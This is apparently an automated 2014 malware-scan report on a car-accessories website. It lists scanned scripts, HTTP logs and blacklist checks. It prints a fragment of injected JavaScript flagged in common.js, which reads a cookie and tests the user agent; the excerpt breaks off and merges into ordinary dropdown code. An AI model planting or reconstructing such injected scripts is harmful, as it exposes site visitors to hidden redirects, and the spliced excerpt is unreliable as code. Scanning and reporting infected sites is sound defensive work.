Scanned pages/files
Request | Server response | Status |
http://autoworldaccessories.com/ | 200 OK Content-Length: 62447 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
https://secure.dealerstore.net/include/ddaccordion.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://secure.dealerstore.net/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://s9.addthis.com/js/widget.php?v=10 | 200 OK Content-Length: 7647 Content-Type: text/plain | clean |
http://autoworldaccessories.com/include/newMMY.js | 200 OK Content-Length: 84929 Content-Type: application/x-javascript | clean |
http://autoworldaccessories.com/include/common.js | 200 OK Content-Length: 6894 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u with (Ctrl) { length=1; for (var intCtr=0; intCtr<=y[strModel][strMake].length -1 ;intCtr++) { options[intCtr+1] = new Option(y[strModel][strMake][intCtr],y[strModel][strMake][intCtr]); if (y[strModel][strMake][intCtr]==SelectedValue) { selectedIndex=intCtr+1; } } } } else { with (Ctrl) { length=1; selectedIndex=0; } } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: autoworldaccessories.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Date: Thu, 09 Oct 2014 22:36:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 62447
Content-Type: text/html
Expires: Fri, 01 Jan 1999 05:00:00 GMT
Set-Cookie: IMGSessionID=A4D8B51648D0444E9740B46CE0AB3E0F; path=/
Set-Cookie: ASPSESSIONIDCQTRQRTT=NHPFKJGDGIHOBIHABAHFPPDD; path=/
X-Powered-By: ASP.NET
...62447 bytes of data.
GET / HTTP/1.1
Host: autoworldaccessories.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Date: Thu, 09 Oct 2014 22:36:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 62447
Content-Type: text/html
Expires: Fri, 01 Jan 1999 05:00:00 GMT
Set-Cookie: IMGSessionID=A4D8B51648D0444E9740B46CE0AB3E0F; path=/
Set-Cookie: ASPSESSIONIDCQTRQRTT=NHPFKJGDGIHOBIHABAHFPPDD; path=/
X-Powered-By: ASP.NET
...62447 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: autoworldaccessories.com
Referer: http://www.google.com/search?q=autoworldaccessories.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: autoworldaccessories.com
Referer: http://www.google.com/search?q=autoworldaccessories.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=autoworldaccessories.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://autoworldaccessories.com/
Result: autoworldaccessories.com is not infected or malware details are not published yet.
Result: autoworldaccessories.com is not infected or malware details are not published yet.